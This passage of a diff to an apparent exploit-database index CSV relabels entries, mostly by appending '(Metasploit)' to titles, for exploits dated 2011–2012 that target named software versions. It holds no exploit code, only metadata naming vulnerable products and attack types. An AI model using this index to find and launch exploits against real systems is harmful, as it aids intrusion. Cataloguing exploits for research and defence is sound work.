Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 -17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit",2011-06-20,mr_me,windows,remote,0 +17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 -17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (2)",2011-06-20,TecR0c,php,webapps,0 +17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 @@ -15185,7 +15185,7 @@ id,file,description,date,author,platform,type,port 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - RTF Header Stack Overflow Exploit",2011-07-03,Snake,windows,local,0 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 -17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)",2011-07-03,"Myo Soe",windows,dos,0 +17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 @@ -15211,7 +15211,7 @@ id,file,description,date,author,platform,type,port 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps,0 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 -17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow",2011-07-07,Metasploit,windows,local,0 +17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (.MPPL) Stack Buffer Overflow",2011-07-07,Metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,Metasploit,windows,remote,80 @@ -15299,7 +15299,7 @@ id,file,description,date,author,platform,type,port 17607,platforms/windows/local/17607.rb,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow Exploit",2011-08-05,ZadYree,linux,local,0 -17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass)",2011-08-05,Rh0,windows,remote,0 +17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0 17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce <= 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 @@ -15317,8 +15317,8 @@ id,file,description,date,author,platform,type,port 17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0 17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass Exploit",2011-08-07,"C4SS!0 G0M3S",windows,local,0 -17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL Interface Universal Path Traversal",2011-08-07,"Myo Soe",hardware,remote,0 -17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL Query Execution",2011-08-07,"Myo Soe",hardware,remote,0 +17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL Interface Universal Path Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 +17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 Persistent XSS",2011-08-08,v0nSch3lling,php,webapps,0 17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent XSS",2011-08-09,Paulzz,php,webapps,0 @@ -15392,7 +15392,7 @@ id,file,description,date,author,platform,type,port 17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,Metasploit,windows,remote,0 17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 -17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0 +17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",php,webapps,0 17724,platforms/php/webapps/17724.txt,"WordPress Js-appointment plugin <= 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17725,platforms/php/webapps/17725.txt,"WordPress MM Forms Community plugin <= 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 @@ -15411,7 +15411,7 @@ id,file,description,date,author,platform,type,port 17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin <= 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 -17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection",2011-08-28,"Spencer McIntyre",php,webapps,0 +17743,platforms/php/webapps/17743.rb,"LifeSize Room - Command Injection (Metasploit)",2011-08-28,"Spencer McIntyre",php,webapps,0 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - (.m3u) Universal BoF",2011-08-29,"D3r K0n!G",windows,local,0 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 17748,platforms/php/webapps/17748.txt,"WordPress SH Slideshow plugin <= 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",php,webapps,0 @@ -15579,7 +15579,7 @@ id,file,description,date,author,platform,type,port 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow PoC",2011-10-05,Snake,windows,dos,0 18033,platforms/php/webapps/18033.txt,"Joomla YJ Contact us Component Local File Inclusion",2011-10-25,MeGo,php,webapps,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 -17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 +17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0 17938,platforms/php/webapps/17938.txt,"EFront <= 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP+ASLR Bypass",2011-10-07,modpr0be,windows,local,0 @@ -15604,7 +15604,7 @@ id,file,description,date,author,platform,type,port 17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 -17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day)",2011-10-10,"Jose A. Vazquez",windows,remote,0 +17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 @@ -15664,7 +15664,7 @@ id,file,description,date,author,platform,type,port 18068,platforms/hardware/remote/18068.rb,"LifeSize Room - Command Injection (Metasploit)",2011-11-02,Metasploit,hardware,remote,0 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 -18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - (CY3 File) Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 +18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - (.CY3) Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 @@ -15685,7 +15685,7 @@ id,file,description,date,author,platform,type,port 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 -18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit",2011-10-31,"Dillon Beresford",windows,remote,0 +18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 @@ -15712,7 +15712,7 @@ id,file,description,date,author,platform,type,port 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Local Root",2011-11-05,zx2c4,linux,local,0 18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 -18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass)",2011-11-07,pasta,windows,remote,0 +18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0 18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18091,platforms/php/webapps/18091.txt,"OrderSys <= 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 @@ -15722,7 +15722,7 @@ id,file,description,date,author,platform,type,port 18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 -18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 +18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,Metasploit,php,webapps,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 @@ -15751,10 +15751,10 @@ id,file,description,date,author,platform,type,port 18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,Metasploit,windows,remote,0 -18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS",2011-11-21,hellok,win_x86,local,0 +18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)",2011-11-21,hellok,win_x86,local,0 18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 -18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 +18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0 @@ -15778,14 +15778,14 @@ id,file,description,date,author,platform,type,port 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0 18177,platforms/php/webapps/18177.txt,"WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0 -18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u)",2011-11-30,Rh0,windows,local,0 +18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) (Metasploit)",2011-11-30,Rh0,windows,local,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Jail Break",2011-12-01,kingcope,windows,remote,0 -18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer Remote Stack BoF",2011-12-01,"Nick Freeman",windows,remote,0 -18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows",2011-12-01,"Nick Freeman",windows,local,0 +18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer Remote Stack BoF (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 +18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 -18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow",2011-12-01,"Nick Freeman",windows,local,0 +18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",windows,remote,0 @@ -15916,7 +15916,7 @@ id,file,description,date,author,platform,type,port 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 -18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0 +18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection (Metasploit)",2012-01-14,"Marco Batista",php,webapps,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,Metasploit,windows,remote,0 @@ -15968,7 +15968,7 @@ id,file,description,date,author,platform,type,port 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 -18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 +18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit (Metasploit)",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 @@ -16051,7 +16051,7 @@ id,file,description,date,author,platform,type,port 18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 - Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 -18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 +18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file param) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 @@ -16200,7 +16200,7 @@ id,file,description,date,author,platform,type,port 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,Metasploit,windows,remote,0 -18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0 +18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps,0 18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 @@ -16266,7 +16266,7 @@ id,file,description,date,author,platform,type,port 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 -18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit",2012-04-27,"Xenithz xpt",windows,local,0 +18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit (Metasploit)",2012-04-27,"Xenithz xpt",windows,local,0 18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection Vulnerabilitiy",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - (.mp4) Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 @@ -16536,7 +16536,7 @@ id,file,description,date,author,platform,type,port 19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilites",2012-06-14,Vulnerability-Lab,php,webapps,0 19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 -19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0 +19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0 @@ -16566,7 +16566,7 @@ id,file,description,date,author,platform,type,port 19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 - xlock (2)",1997-04-26,BeastMaster,unix,local,0 19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 -19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,Metasploit,windows,local,0 +19176,platforms/windows/local/19176.rb,"TFM MMPlayer (.m3u/.ppl) Buffer Overflow",2012-06-15,Metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 19178,platforms/php/webapps/19178.txt,"webo site speedup <= 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 @@ -16715,7 +16715,7 @@ id,file,description,date,author,platform,type,port 